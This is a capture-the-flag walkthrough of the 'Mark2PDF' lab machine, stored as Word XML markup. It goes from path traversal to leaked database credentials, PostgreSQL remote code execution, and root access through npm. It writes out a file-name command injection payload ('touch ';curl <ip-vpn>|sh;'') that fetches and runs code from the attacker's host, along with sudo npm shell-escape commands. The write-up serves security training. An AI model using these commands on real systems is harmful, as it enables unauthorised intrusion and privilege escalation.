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MARK2PDF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9vw27g28r36p"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determine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78000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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observed the presence of port 80 hosting a web service and port 5432 corresponding to the PostgreSQL database management system.</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port 80 for the web service, we are automatically redirected to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mark2pdf.hc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0" l="0" r="0" t="0"/>
            <wp:docPr id="71"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resolve this, it is necessary to map the IP address to the domain name by adding an entry to the hosts file, as shown in the image below.</w:t>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6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application again, we observe that it is intended for converting Markdown files to PDF. The next step is to create an account in order to log in.</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14700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="79"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 successful login, we have the ability to upload a Markdown file to be converted into PDF. At this point, we will proceed with this step.</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32200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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uploading a Markdown file for PDF conversion, it is possible to view it. By examining the URL, we identify a potential attack vector to exploit a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Path Traversal</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerability. Therefore, we will attempt to exploit this vulnerability.</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7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intercepting the request using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 we were able, through directory traversal (Path Traversal), to read the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">passwd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79700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="66"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successful exploitation, we can now attempt to read the application's source code. However, since we do not know the exact path, we can read the file </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/proc/self/cmdline</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which points to the directory of the current process. This will provide us with the absolute path of the application.</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0" l="0" r="0" t="0"/>
            <wp:docPr id="6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a code review, we did not identify other vulnerabilities that could provide </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Remote Code Execution (RCE)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. However, considering that the database is exposed, we can attempt to read the file </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">db.js</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which potentially contains the credentials to access it.</w:t>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67000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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87500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="61"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credentials in hand, we have the ability to access the database.</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psql -U md2pdfuser -h [HOST] -d md2pdfdb</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73200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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While researching PostgreSQL possibilities, we came across the article below, which suggests obtaining </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Remote Code Execution (RCE)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. However, to achieve this, our user must be a superuser. One way to verify this condition is by executing the following SQL command:</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SELECT usesuper FROM pg_user WHERE usename = 'postgres';</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5432,5433 - Pentesting PostgreSQL</w:t>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hyperlink r:id="rId19">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://book.hacktricks.xyz/network-services-pentesting/pentesting-postgresql#rce</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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87500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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our user has superuser privileges, we can now insert a reverse shell payload, following the provided link.</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28800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="78"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Reverse shell payload:</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78000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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have a shell:</w:t>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76400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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jy5ejpiz7jey" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Upgrading a simple shell to fully interactive TTYs:</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25600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="68"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a shell, it appears we need to escalate privileges to the user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mark2pdfuser</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. When examining the file </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/crontab</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we observe a cron job associated with this user, scheduled to run every 2 minutes.</w:t>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98800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="65"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take a look at the contents of the script </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">remove_excess_files.py</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> located in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/opt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory.</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During the script analysis, the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">command injection</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerability becomes evident:</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70200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="81"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we have write permissions in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">uploads/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory, we will have the possibility to exploit it. However, when analyzing the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">if</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condition, we notice that there must be more than 5 files in that directory for the function to be executed.</w:t>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85900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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see that we have write permissions in this directory, so now we will create our payload.</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create a file called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index.html</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> on our local machine, which will contain our reverse shell payload. Then, we will host it using a Python server.</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74800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="82"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access the directory </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/home/mark2pdfuser/webapp/uploads</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and create three empty files to ensure that the function is executed.</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touch a b c</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49400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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that, we will create the file name. The file name will be the payload that we will inject to obtain a reverse shell.</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touch ';curl &lt;ip-vpn&gt;|sh;'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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73200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="76"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28800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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the cron execution, we establish the connection and gain shell access.</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98600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="53"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home directory of the user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mark2pdfuser</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we can obtain our first flag.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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5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retrieving our first user flag, it is time to escalate privileges to obtain our final flag. For this, we will need to escalate to the root user.</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the command </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo -l</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we observe that we have permission to execute </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/npm *</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with root privileges, without needing to enter a password.</w:t>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52600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="80"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accessing the link below, we can follow the steps to escalate privileges:</w:t>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hyperlink r:id="rId34">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://gtfobins.github.io/gtfobins/npm/#sudo</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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TF=$(mktemp -d)</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'{"scripts": {"preinstall": "/bin/sh"}}' &gt; $TF/package.json</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npm -C $TF --unsafe-perm i</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commands above create a temporary directory, create a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">package.json</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file in that directory with an installation script that executes </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and then use the npm command to install Node.js packages in the temporary directory with root user permissions.</w:t>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79500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="67"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commands, we obtain a root shell and can read the final flag located at:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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231900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="74"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Fonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And with that, we complete the challenge.</w:t>
      </w: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C">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.175f5cs94z0o"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7" name="image16.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image16.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D">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E">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5" name="image7.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image7.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Mark2PDF</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3.png"/><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image" Target="media/image11.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2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31.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.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8.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gtfobins.github.io/gtfobins/npm/#sudo" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.xyz/network-services-pentesting/pentesting-postgresql#rce" TargetMode="External"/><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 Id="rId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soWgaznmD5zELh+NZ2gQaokJQ==">CgMxLjAyDmgubWQ1eDI5eGxxOGRpMg5oLncxaGN6OHhqcnZmNTIOaC42Z2p5eWZ3eWl1MDIyDmgubGUzYWxjYXhkZjRvMg5oLjl2dzI3ZzI4cjM2cDIOaC5qeTVlanBpejdqZXkyDmguMTc1ZjVjczk0ejBvOAByITFHMzlUdUloLWpqMUtnZDktdHhsTkpCMmVuV1R3dFBVNA==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